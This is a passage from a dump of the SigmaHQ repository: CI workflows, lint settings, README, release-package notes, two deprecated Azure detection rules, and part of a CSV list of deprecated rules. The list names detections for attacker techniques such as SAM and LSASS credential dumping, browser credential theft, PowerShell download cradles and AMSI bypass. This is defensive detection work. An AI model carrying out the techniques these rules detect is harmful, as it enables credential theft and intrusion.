steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Check for duplicate IDs\n      shell: /usr/bin/bash {0}  # Use bash without -e to enable exit code manipulation\n      run: |\n        grep -rh \"^id: \" rules* deprecated unsupported | sort | uniq -c | grep -vE \"^\\s+1 id: \"; exit $(( $? ^ 1 ))\n"
  },
  {
    "path": ".github/workflows/sigma-validation.yml",
    "content": "name: Validate Sigma rules\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\njobs:\n  sigma-rules-validator:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Validate Sigma rules\n        uses: SigmaHQ/sigma-rules-validator@v1\n        with:\n          paths: |-\n            ./rules\n            ./rules-compliance\n            ./rules-dfir\n            ./rules-emerging-threats\n            ./rules-placeholder\n            ./rules-threat-hunting\n          schemaFile: ${{ github.workspace }}/tests/validate-sigma-schema/sigma-schema.json\n"
  },
  {
    "path": ".github/workflows/update-heatmap.yml",
    "content": "name: Generate Updated ATT&CK Heatmap\non:\n  schedule:\n    - cron: \"0 0 1 * *\"\n  workflow_dispatch:\n\n\njobs:\n  generate-heatmap:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout Repository\n        uses: actions/checkout@v5\n        with:\n          submodules: true\n\n      - name: Install Sigma\n        run: pipx install sigma-cli\n\n      - name: Update Heatmap\n        run: sigma analyze attack count --min-score 0 --max-score 20 --min-color '#66b1ffff' --max-color '#ff66f4ff' ./other/sigma_attack_nav_coverage.json rule*\n\n      - name: Create Pull Request\n        uses: peter-evans/create-pull-request@v7\n        with:\n          reviewers: nasbench, frack113, phantinuss\n          delete-branch: true\n          commit-message: 'chore: update ATT&CK heatmap'\n          branch: 'create-pull-request/update-heatmap'\n          title: 'Update ATT&CK Heatmap Coverage'\n          body: |\n            ### Summary of the Pull Request\n\n            This PR updates sigma_attack_nav_coverage.json to reflect the current rule coverage.\n            To generate a new SVG file, go to the [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/SigmaHQ/sigma/master/other/sigma_attack_nav_coverage.json) and export a SVG via \"Layer Controls\" > \"Export\" (download icon) > \"render layer to SVG\".\n\n            ### Changelog\n\n            chore: update ATT&CK heatmap\n\n            ### Example Log Event\n\n            N/A\n\n            ### Fixed Issues\n\n            N/A\n\n            ### SigmaHQ Rule Creation Conventions\n\n            - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n"
  },
  {
    "path": ".gitignore",
    "content": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\n*.egg-info/\n.installed.cfg\n*.egg\n\n# PyInstaller\n#  Usually these files are written by a python script from a template\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*,cover\n.hypothesis/\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\nlocal_settings.py\n\n# Flask stuff:\ninstance/\n.webassets-cache\n\n# MacOS Finder\n.DS_Store\n\n# Scrapy stuff:\n.scrapy\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# IPython Notebook\n.ipynb_checkpoints\n\n# pyenv\n.python-version\n\n# celery beat schedule file\ncelerybeat-schedule\n\n# dotenv\n.env\n\n# virtualenv\nvenv/\nENV/\n\n# Spyder project settings\n.spyderproject\n\n# Rope project settings\n.ropeproject\n\n# vi(m)\n*.swp\nsettings.json\n\n# VisualStudio\n.vs/\n.vscode/launch.json\n\n# sigma2attack\nheatmap.json\n"
  },
  {
    "path": ".yamllint",
    "content": "# https://yamllint.readthedocs.io/en/latest/configuration.html\nextends: default\n\nignore:\n    - .github/\n    - deprecated/\n    - other/godmode_sigma_rule.yml\n    - tests/\n    - unsupported/\n\nrules:\n    comments:\n        require-starting-space: true\n        min-spaces-from-content: 1\n    comments-indentation: disable\n    document-start: {present: false}\n    empty-lines: {max: 2, max-start: 2, max-end: 2}\n    indentation: {spaces: 4, indent-sequences: whatever}\n    line-length: disable\n    new-line-at-end-of-file: enable\n    trailing-spaces: {}\n"
  },
  {
    "path": "CONTRIBUTING.md",
    "content": "# Contributing to Sigma 🧙‍♂️\n\nFirst off, thank you for considering contributing to Sigma! Your help is invaluable in keeping this project up-to-date and useful for the community.\n\nThe following guidelines will help you understand how to contribute effectively.\n\n## 📝 Reporting False Positives Or Proposing New Detection Rule Ideas 🔎\n\nIf you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.\n\n## 🛠️ Submitting Pull Requests (PRs)\n\n1. Fork the [SigmaHQ repository](https://github.com/SigmaHQ/sigma) and clone your fork to your local machine.\n\n2. Create a new branch for your changes:\n\n```bash\ngit checkout -b your-feature-branch\n```\n\n3. Make your changes, and test them:\n\n```bash\npython tests/test_logsource.py\npython tests/test_rules.py\n```\n\n4. Once the test is successful, commit the changes to your branch:\n\n```bash\ngit add .\ngit commit -m \"Your commit message\"\n```\n\n5. Push your changes to your fork:\n\n```bash\ngit push origin your-feature-branch\n```\n\n6. Create a new Pull Request (PR) against the upstream repository:\n\n* Go to the [Sigma repository](https://github.com/SigmaHQ/sigma) on GitHub\n* Click the \"New Pull Request\" button\n* Choose your fork and your feature branch\n* Add a clear and descriptive title and a detailed description of your changes\n* Submit the Pull Request\n\n## 📚 Adding or Updating Detection Rules\n\nTo update or contribute a new rule please make sure to follow the guidelines in the [SigmaHQ conventions documents](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq). Consider installing the [VsCode Sigma Extension](https://marketplace.visualstudio.com/items?itemName=humpalum.sigma) for auto completion and quality of life features.\n\nThank you for contributing to Sigma! 
🧙‍♂️\n"
  },
  {
    "path": "LICENSE",
    "content": "# Licenses\n\nThe content of this repository is released under the following licenses:\n\n- The Sigma specification (https://github.com/SigmaHQ/sigma-specification) and the Sigma logo are public domain\n- The rules contained in the SigmaHQ repository (https://github.com/SigmaHQ) are released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License)\n"
  },
  {
    "path": "README.md",
    "content": "# Sigma - Generic Signature Format for SIEM Systems\n\n<a href=\"https://sigmahq.io/\">\n<p align=\"center\">\n<br />\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"./images/sigma_logo_dark.png\">\n  <img width=\"454\" alt=\"Sigma Logo\" src=\"./images/sigma_logo_light.png\">\n</picture>\n</p>\n</a>\n<br />\n\n<p align=\"center\">\n<a href=\"https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster\"><img src=\"https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master\" alt=\"Sigma Build Status\"></a> <a href=\"https://sigmahq.io/\"><img src=\"https://cdn.jsdelivr.net/gh/SigmaHQ/sigmahq.github.io@master/images/Sigma%20Official%20Badge.svg\" alt=\"Sigma Official Badge\"></a> <img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/SigmaHQ/sigma\">\n<img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/SigmaHq/Sigma/total\">\n<br />\n<a href=\"https://opensourcesecurityindex.io/\" target=\"_blank\" rel=\"noopener\">\n<img style=\"width: 170px;\" src=\"https://opensourcesecurityindex.io/badge.svg\" alt=\"Open Source Security Index - Fastest Growing Open Source Security Projects\" width=\"170\" />\n</a>\n</p>\n\nWelcome to the Sigma main rule repository. The place where detection engineers, threat hunters and all defensive security practitioners collaborate on detection rules. 
The repository offers more than 3000 detection rules of different types and aims to make reliable detections accessible to all at no cost.\n\nCurrently the repository offers the following types of rules:\n\n* [Generic Detection Rules](./rules/) - Are threat agnostic; their aim is to detect a behavior or an implementation of a technique or procedure that was, can or will be used by a potential threat actor.\n* [Threat Hunting Rules](./rules-threat-hunting/) - Are broader in scope and are meant to give the analyst a starting point to hunt for potentially suspicious or malicious activity.\n* [Emerging Threat Rules](./rules-emerging-threats/) - Are rules that cover specific threats that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of zero-day vulnerabilities, specific malware used during an attack, etc.\n* [Compliance Rules](./rules-compliance/) - Are rules that help you identify compliance violations based on well-known security frameworks such as CIS Controls, NIST, ISO 27001, etc.\n* [Placeholder Rules](./rules-placeholder/) - Are rules that get their final meaning at conversion or usage time of the rule.\n\n## Explore Sigma\n\nTo start exploring the Sigma ecosystem, please visit the official website [sigmahq.io](https://sigmahq.io).\n\n### What is Sigma\n\nSigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. 
The rule format is very flexible, easy to write and applicable to any type of log file.\n\nThe main purpose of this project is to provide a structured form in which researchers or analysts can describe the detection methods they have developed and make them shareable with others.\n\nSigma is for log files what [Snort](https://www.snort.org/) is for network traffic and [YARA](https://github.com/VirusTotal/yara) is for files.\n\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"./images/Sigma_description_dark.png\">\n  <img alt=\"Sigma Description - A diagram showing Yaml Files (Sigma Rules) moving through a Sigma Convertor, and coming out as many SIEM logos, showing how Sigma rules can be converted to many different available SIEM query languages\" src=\"./images/Sigma_description_light.png\">\n</picture>\n\n### Why Sigma\n\nToday, everyone collects log data for analysis. People start working on their own, processing numerous white papers, blog posts and log analysis guidelines, extracting the necessary information and building their own searches and dashboards. Some of their searches and correlations are great and very useful, but they lack a standardized format in which they can share their work with others.\n\nOthers provide excellent analyses, include IOCs and YARA rules to detect the malicious files and network connections, but have no way to describe a specific or generic detection method in log events. 
Sigma is meant to be an open standard in which such detection mechanisms can be defined, shared and collected in order to improve the detection capabilities for everyone.\n\n### 🌟 Key Features\n\n* A continuously growing list of detection and hunting rules, peer reviewed by a community of professional Detection Engineers.\n* Vendor-agnostic detection rules.\n* Easily shareable across communities and reports.\n\n## 🏗️ Rule Creation\n\nTo start writing Sigma rules please check the following high-level guide along with the Sigma specification:\n\n* [Rule Creation High‐Level Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-High%E2%80%90Level-Guide)\n* [Sigma Specification](https://github.com/SigmaHQ/sigma-specification)\n\n## 🔎 Contributing & Making PRs\n\nPlease refer to the [CONTRIBUTING](./CONTRIBUTING.md) guide for detailed instructions on how you can start contributing new rules.\n\n## 📦 Rule Packages\n\nYou can download the latest rule packages from the [release page](https://github.com/SigmaHQ/sigma/releases/latest) and start leveraging Sigma rules today.\n\n## 🧬 Rule Usage and Conversion\n\n* You can start converting Sigma rules today using [Sigma CLI](https://github.com/SigmaHQ/sigma-cli) or [sigconverter.io](https://sigconverter.io), the GUI interface.\n\n* To integrate Sigma rules in your own toolchain or products, use [pySigma](https://github.com/SigmaHQ/pySigma).\n\n## 🚨 Reporting False Positives or New Rule Ideas\n\nIf you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.\n\n## 📚 Resources & Further Reading\n\n* [Hack.lu 2017 Sigma - Generic Signatures for Log Events by Thomas Patzke](https://www.youtube.com/watch?v=OheVuE9Ifhs)\n* [MITRE ATT&CK® and Sigma Alerting SANS Webcast 
Recording](https://www.sans.org/webcasts/mitre-att-ck-sigma-alerting-110010 \"MITRE ATT&CK® and Sigma Alerting\")\n* [Sigma - Generic Signatures for SIEM Systems by Florian Roth](https://www.slideshare.net/secret/gvgxeXoKblXRcA)\n\n## Projects or Products that use or integrate Sigma rules\n\n* [AlphaSOC](https://docs.alphasoc.com/detections_and_findings/sigma_community/) - Leverages Sigma rules to increase coverage across all supported log sources\n* [alterix](https://github.com/mtnmunuklu/alterix) - Converts Sigma rules to the query language of CRYPTTECH's SIEM\n* [AttackIQ](https://www.attackiq.com/2024/01/10/sigmaiq-attackiqs-latest-innovation-for-actionable-detections/) - Sigma rules integrated into AttackIQ's platform, and [SigmAIQ](https://github.com/AttackIQ/SigmAIQ) for Sigma rule conversion and LLM apps\n* [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (Since December 2018)\n* [AttackRuleMap - Mapping of Atomic Red Team tests and Sigma Rules](https://attackrulemap.com/)\n* [Confluent Sigma](https://github.com/confluentinc/confluent-sigma) - Sigma rules support for Kafka Streams\n* [Detection Studio](https://detection.studio/?ref=sigmahq_readme) - Convert Sigma rules to any supported SIEM\n* [IBM QRadar](https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2023/08/02/qradar-natively-supports-sigma-for-rules-creation)\n* [Impede Detection Platform](https://impede.ai/)\n* [Joe Sandbox](https://www.joesecurity.org/blog/8225577975210857708)\n* [LimaCharlie](https://limacharlie.io/)\n* [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (Since Version 2.4.70, March 2017)\n* [Nextron's Aurora Agent](https://www.nextron-systems.com/aurora/)\n* [Nextron's THOR Scanner](https://www.nextron-systems.com/thor/) - Scan with Sigma rules on endpoints\n* [RANK VASA](https://globenewswire.com/news-release/2019/03/04/1745907/0/en/RANK-Software-to-Help-MSSPs-Scale-Cybersecurity-Offerings.html)\n* 
[Saeros](https://github.com/Saeros-Security/Saeros)\n* [Security Onion](https://docs.securityonion.net/en/latest/sigma.html)\n* [Sekoia.io XDR](https://www.sekoia.io) - XDR supporting Sigma and Sigma Correlation rule languages\n* [sigma2stix](https://github.com/muchdogesec/sigma2stix) - Converts the entire SigmaHQ ruleset into STIX 2.1 objects\n  * A versioned archive of sigma2stix STIX 2.1 data is also available to [download here](https://github.com/muchdogesec/cti_knowledge_base_store/tree/main/sigma-rules).\n* [SIΣGMA](https://github.com/3CORESec/SIEGMA) - SIEM consumable generator that utilizes Sigma for query conversion\n* [SOC Prime](https://my.socprime.com/sigma/)\n* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches) (Splunk App)\n* [TimeSketch](https://github.com/google/timesketch/commit/0c6c4b65a6c0f2051d074e87bbb2da2424fa6c35)\n* [ypsilon](https://github.com/P4T12ICK/ypsilon) - Automated Use Case Testing\n\n## 📜 Maintainers\n\n* [Nasreddine Bencherchali (@nas_bench)](https://twitter.com/nas_bench)\n* [Florian Roth (@cyb3rops)](https://twitter.com/cyb3rops)\n* [Christian Burkard (@phantinuss)](https://twitter.com/phantinuss)\n* [François Hubaut (@frack113)](https://twitter.com/frack113)\n* [Thomas Patzke (@blubbfiction)](https://twitter.com/blubbfiction)\n\n## Credits\n\nThis project would never have reached this height without the help of its hundreds of contributors. Thanks to all past and present contributors for their help.\n\n## Licenses\n\nThe content of this repository is released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License).\n"
  },
  {
    "path": "Releases.md",
    "content": "The following document describes the different types of rule packages provided with every release.\n\n## Package Introduction\n\nThe rule packages provided with every release are split based on the [status](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#status-optional), [level](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#level) and [type](https://medium.com/sigma-hq/sigma-rule-repository-enhancements-new-folder-structure-rule-types-30adb70f5e10) of a Sigma rule.\n\nThere are currently 3 main rule types provided in the Sigma repository:\n\n- **core/generic**: Rules that match on attacker techniques. These rules are timeless and often match on new threats.\n- **emerging-threats/ET**: Rules that match on patterns of specific threat actors or exploits. They have a high signal-to-noise ratio but decrease in relevance over time.\n- **threat-hunting/TH**: Rules that should not be run for alerting but are useful for generating detection ideas or hunting for suspicious activity inside an environment.\n\n### Package Overview\n\nName | Status | Level | Type\n--- | --- | --- | ---\n[Core (Default)](#core-rules) | testing, stable | high, critical | core\n[Core+ (Rule Review needed)](#core-rules-1) | testing, stable | medium, high, critical | core\n[Core++ (Experimental)](#core-rules-2) | experimental, testing, stable | medium, high, critical | core\n[Emerging Threats AddOn Rules](#et-emerging-threats-addon-rules) | experimental, testing, stable | medium, high, critical | emerging threats\n[All rules](#all-rules) | experimental, testing, stable | medium, high, critical | core, emerging threats\n\nIf you are new, it is best to start with the `Core` Sigma package. It includes high-quality rules of high confidence and relevance and should not produce many false positives.\n\nIf your setup is working fine, you can add the `emerging threats` rules and start thinking about upgrading to `Core+` rules. 
If that is not enough and you like the pain, use the \"all\" rules package.\n\n### Defined Packages\n\n#### Core Rules\n\nThe `Core` Sigma package includes high-quality rules of high confidence and relevance and should not produce many false positives.\n\nThe selected rules are of level `high` or `critical`, which means matches are of high or critical importance. The rule status is `testing` or `stable`, which means the rule is at least half a year old and no false positives have been reported for it.\n\nThe type is `core`, meaning the rules match on attacker techniques and generic suspicious or malicious behavior.\n\n#### Core+ Rules\n\nThe plus in the `Core+` Sigma package stands for the addition of `medium` level rules. Those rules most often need additional tuning, as certain applications, legitimate user behavior or scripts of an organization might be matched. Not every `medium` level rule is useful in every organization.\n\n#### Core++ Rules\n\nThe `Core++` package additionally includes the rules of `experimental` status. These rules are bleeding-edge. They are validated against the Goodlog tests available to the SigmaHQ project and reviewed by multiple detection engineers. Other than that, they are pretty much untested at first. Use these if you want to be able to detect threats as early as possible at the cost of managing a higher number of false positives.\n\nPlease report any false positives you find in the wild via our [GitHub issue tracker](https://github.com/SigmaHQ/sigma/issues/new?assignees=&labels=False-Positive&projects=&template=false_positive_report.yml). After a grace period all `experimental` rules will eventually be promoted to status `test`.\n\n### Package AddOns\n\n#### ET (Emerging Threats) AddOn Rules\n\nThe `ET AddOn` Sigma package contains all of the `emerging threats` rules. These rules have a low false positive rate, so the package already contains rules of status `experimental`. 
These rules target specific threats and are especially useful for current threats where not much information may be available yet, so we want to get them to you as fast as possible. The package is an `AddOn`, so you can use it on top of whichever `Core` package is most useful to you.\n\n### All Rules\n\n> **Note**\n>\n> This package doesn't contain all rules.\n\nThis package includes all rules of level `medium` and above with a status of `experimental` and above, including the `emerging threats` rules. Some heavy tuning is required when using this package.\n\nYou'll notice that rules of level `low` and some others are omitted even from the `All Rules` package. We do not recommend using any other types of rules to generate alerts except for those provided in these packages.\n\n### Create Your Own Custom Rule Package\n\nReleases are tagged using the format `r<ISO 8601 date>` (e.g. `r2023-12-24`).\n\nYou can check out any release version and create your own package using the [sigma-package-release](tests/sigma-package-release.py) script. Define the `status`, `level` and `type` of the rules, and the script generates a ZIP archive containing only those rules.\n\nFor example:\n\n```bash\n# python3 tests/sigma-package-release.py --min-status testing --levels high critical --types generic --outfile Sigma-custom.zip\n```\n\nYou can give `level` and `status` either as a space-separated list or as a minimum value. See `--help` for all options.\n"
  },
  {
    "path": "deprecated/README.md",
    "content": "# Deprecated folder\r\n\r\nThis folder contains all rules that have been marked as deprecated.\r\n\r\nIt is recommended to avoid using these rules, as they are no longer maintained or supported.\r\n\r\nFor a summary of the deprecated rules, refer to [deprecated.csv](./deprecated.csv) or [deprecated.json](./deprecated.json).\r\n\r\n# References\r\n\r\nhttps://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#status"
  },
  {
    "path": "deprecated/cloud/azure_app_credential_modification.yml",
    "content": "title: Azure Application Credential Modified\nid: cdeef967-f9a1-4375-90ee-6978c5f23974\nstatus: deprecated\ndescription: Identifies when an application credential is modified.\nreferences:\n    - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2025-10-17\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: 'Update application – Certificates and secrets management'\n    condition: selection\nfalsepositives:\n    - Adding an application credential may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application credentials added by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "deprecated/cloud/azure_app_permissions_for_api.yml",
    "content": "title: App Permissions Granted For Other APIs\nid: ba2a7c80-027b-460f-92e2-57d113897dbc\nstatus: deprecated\ndescription: Detects when app permissions (app roles) for other APIs are granted\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022/07/28\nmodified: 2023/03/29\ntags:\n    - attack.privilege_escalation\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: medium\n"
  },
  {
    "path": "deprecated/deprecated.csv",
    "content": "id,title,date,modified,level\n867613fb-fa60-4497-a017-a82df74a172c,PowerShell Execution,2019-09-12,2021-11-05,medium\n0d894093-71bc-43c3-8c4d-ecfc28dcf5d9,Mimikatz Detection LSASS Access,2017-10-18,2022-04-11,high\n3d304fda-78aa-43ed-975c-d740798a49c1,Suspicious PowerShell Invocations - Generic,2017-03-12,2022-04-11,high\n56a8189f-11b2-48c8-8ca7-c54b03c2fbf7,Suspicious Esentutl Use,2020-05-23,2022-04-11,high\n65531a81-a694-4e31-ae04-f8ba5bc33759,Suspicious PowerShell Download,2017-03-05,2022-04-11,medium\n9f7aa113-9da6-4a8d-907c-5f1a4b908299,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium\na0d63692-a531-4912-ad39-4393325b2a9c,RClone Execution,2021-05-10,2022-04-11,high\nb932b60f-fdda-4d53-8eda-a170c1d97bbd,Activity Related to NTDS.dit Domain Hash Retrieval,2019-01-16,2022-04-11,high\ncb7286ba-f207-44ab-b9e6-760d82b84253,Rclone Execution via Command Line or PowerShell,2021-05-26,2022-04-11,high\nfde7929d-8beb-4a4c-b922-be9974671667,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium\n17f878b8-9968-4578-b814-c4217fc5768c,Autorun Keys Modification,2019-10-25,2022-05-14,medium\n29d31aee-30f4-4006-85a9-a4a02d65306c,Lateral Movement Indicator ConDrv,2021-04-27,2022-05-14,low\n98f4c75c-3089-44f3-b733-b327b9cd9c9d,Accessing Encrypted Credentials from Google Chrome Login Database,2021-12-20,2022-05-14,medium\na457f232-7df9-491d-898f-b5aabd2cbe2f,Windows Management Instrumentation DLL Loaded Via Microsoft Word,2019-12-26,2022-05-14,informational\ndb2110f3-479d-42a6-94fb-d35bc1e46492,CreateMiniDump Hacktool,2019-12-22,2022-05-14,high\n2621b3a6-3840-4810-ac14-a02426086171,Winword.exe Loads Suspicious DLL,2020-10-09,2022-07-25,medium\nbf6c39fc-e203-45b9-9538-05397c1b4f3f,Abusing Findstr for Defense Evasion,2020-10-05,2022-10-12,medium\n82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719,Possible Applocker Bypass,2019-01-16,2022-11-03,low\ndca91cfd-d7ab-4c66-8da7-ee57d487b35b,Process 
Start From Suspicious Folder,2022-02-11,2022-11-03,low\n53c7cca0-2901-493a-95db-d00d6fcf0a37,Brute Force,2019-10-25,2022-11-04,medium\n5f113a8f-8b61-41ca-b90f-d374fa7e4a39,Suspicious In-Memory Module Execution,2019-10-27,2022-11-17,low\nf67dbfce-93bc-440d-86ad-a95ae8858c90,Suspicious Bitsadmin Job via PowerShell,2018-10-30,2022-11-21,high\n9d1c72f5-43f0-4da5-9320-648cf2099dd0,Excel Proxy Executing Regsvr32 With Payload,2021-08-23,2022-12-02,high\nc0e1c3d5-4381-4f18-8145-2583f06a1fe5,Excel Proxy Executing Regsvr32 With Payload Alternate,2021-08-23,2022-12-02,high\n72671447-4352-4413-bb91-b85569687135,Nslookup PwSh Download Cradle,2022-09-06,2022-12-14,medium\n3f07b9d1-2082-4c56-9277-613a621983cc,Accessing WinAPI in PowerShell for Credentials Dumping,2020-10-06,2022-12-18,high\ne554f142-5cf3-4e55-ace9-a1b59e0def65,DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon,2020-10-12,2022-12-18,critical\n17eb8e57-9983-420d-ad8a-2c4976c22eb8,MavInject Process Injection,2018-12-12,2022-12-19,high\n36c5146c-d127-4f85-8e21-01bf62355d5a,Invoke-Obfuscation Via Use Rundll32,2019-10-08,2022-12-30,high\n6d3f1399-a81c-4409-aff3-1ecfe9330baf,PrintNightmare Powershell Exploitation,2021-08-09,2023-01-02,high\n83083ac6-1816-4e76-97d7-59af9a9ae46e,AzureHound PowerShell Commands,2021-10-23,2023-01-02,high\na85cf4e3-56ee-4e79-adeb-789f8fb209a8,Indirect Command Exectuion via Forfiles,2022-10-17,2023-01-04,medium\nfa47597e-90e9-41cd-ab72-c3b74cfb0d02,Indirect Command Execution,2019-10-24,2023-01-04,low\ne4b63079-6198-405c-abd7-3fe8b0ce3263,Suspicious CLR Logs Creation,2020-10-12,2023-01-05,high\ncd5c8085-4070-4e22-908d-a5b3342deb74,Suspicious Bitstransfer via PowerShell,2021-08-19,2023-01-10,medium\nd178a2d7-129a-4ba4-8ee6-d6e1fecd5d20,Renamed PowerShell,2019-08-22,2023-01-18,high\nd4d2574f-ac17-4d9e-b986-aeeae0dc8fe2,Renamed Rundll32.exe Execution,2022-06-08,2023-01-18,high\ne31f89f7-36fb-4697-8ab6-48823708353b,Suspicious Cmd Execution via 
WMI,2022-09-27,2023-01-19,medium\nbf7286e7-c0be-460b-a7e8-5b2e07ecc2f2,Netcat The Powershell Version - PowerShell Module,2021-07-21,2023-01-20,medium\n47688f1b-9f51-4656-b013-3cc49a166a36,Base64 Encoded Listing of Shadowcopy,2022-03-01,2023-01-30,high\n5b572dcf-254b-425c-a8c5-d9af6bea35a6,Potential Xor Encoded PowerShell Command,2022-07-06,2023-01-30,medium\nfd6e2919-3936-40c9-99db-0aa922c356f7,Malicious Base64 Encoded Powershell Invoke Cmdlets,2022-05-31,2023-01-30,high\neeb66bbb-3dde-4582-815a-584aee9fe6d1,Correct Execution of Nltest.exe,2021-10-04,2023-02-02,high\n0acaad27-9f02-4136-a243-c357202edd74,Ryuk Ransomware Command Line Activity,2019-08-06,2023-02-03,critical\n4f927692-68b5-4267-871b-073c45f4f6fe,PowerShell AMSI Bypass Pattern,2022-11-04,2023-02-03,high\n038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e,Registry Dump of SAM Creds and Secrets,2022-01-05,2023-02-04,high\n04f5363a-6bca-42ff-be70-0d28bf629ead,Office Applications Spawning Wmi Cli Alternate,2021-08-23,2023-02-04,high\n23daeb52-e6eb-493c-8607-c4f0246cb7d8,New Lolbin Process by Office Applications,2021-08-23,2023-02-04,high\n518643ba-7d9c-4fa5-9f37-baed36059f6a,WMI Execution Via Office Process,2021-08-23,2023-02-04,medium\n77815820-246c-47b8-9741-e0def3f57308,Domain Trust Discovery,2019-10-23,2023-02-04,medium\n4d6c9da1-318b-4edf-bcea-b6c93fa98fd0,Credential Acquisition via Registry Hive Dumping,2022-10-04,2023-02-06,high\n6545ce61-a1bd-4119-b9be-fcbee42c0cf3,Execute MSDT.EXE Using Diagcab File,2022-06-09,2023-02-06,high\n9841b233-8df8-4ad7-9133-b0b4402a9014,Sysinternals SDelete Registry Keys,2020-05-02,2023-02-07,medium\n09af397b-c5eb-4811-b2bb-08b3de464ebf,WMI Reconnaissance List Remote Services,2022-01-01,2023-02-14,medium\n7b0666ad-3e38-4e3d-9bab-78b06de85f7b,Renamed PaExec Execution,2019-04-17,2023-02-14,medium\nbc3cc333-48b9-467a-9d1f-d44ee594ef48,SCM DLL Sideload,2022-12-01,2023-02-14,medium\ne42af9df-d90b-4306-b7fb-05c863847ebd,WMI Remote Command 
Execution,2022-03-13,2023-02-14,medium\nfa4b21c9-0057-4493-b289-2556416ae4d7,Squirrel Lolbin,2019-11-12,2023-02-14,medium\ne011a729-98a6-4139-b5c4-bf6f6dd8239a,Suspicious Certutil Command Usage,2019-01-16,2023-02-15,high\n034affe8-6170-11ec-844f-0f78aa0c4d66,Mimikatz MemSSP Default Log File Creation,2021-12-20,2023-02-16,critical\n7fe71fc9-de3b-432a-8d57-8c809efc10ab,New Service Creation,2019-10-21,2023-02-20,low\n056a7ee1-4853-4e67-86a0-3fd9ceed7555,Invoke-Obfuscation RUNDLL LAUNCHER,2020-10-18,2023-02-21,medium\n3ede524d-21cc-472d-a3ce-d21b568d8db7,PsExec Service Start,2018-03-13,2023-02-28,low\n80167ada-7a12-41ed-b8e9-aa47195c66a1,Run Whoami as SYSTEM,2019-10-23,2023-02-28,high\nfa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba,PsExec Tool Execution,2017-06-12,2023-02-28,low\n2c0d2d7b-30d6-4d14-9751-7b9113042ab9,Suspicious Characters in CommandLine,2022-04-27,2023-03-03,high\n6783aa9e-0dc3-49d4-a94a-8b39c5fd700b,Stop Or Remove Antivirus Service,2021-07-07,2023-03-04,high\n7fd4bb39-12d0-45ab-bb36-cebabc73dc7b,Suspicious Execution of Sc to Delete AV Services,2022-08-01,2023-03-04,high\na7a7e0e5-1d57-49df-9c58-9fe5bc0346a2,Renamed PsExec,2019-05-21,2023-03-04,high\n1a70042a-6622-4a2b-8958-267625349abf,Run from a Zip File,2021-12-26,2023-03-05,medium\n46591fae-7a4c-46ea-aec3-dff5e6d785dc,Root Certificate Installed,2020-10-10,2023-03-05,medium\neb87818d-db5d-49cc-a987-d5da331fbd90,Stop Windows Service,2019-10-23,2023-03-05,low\n23250293-eed5-4c39-b57a-841c8933a57d,Visual Basic Script 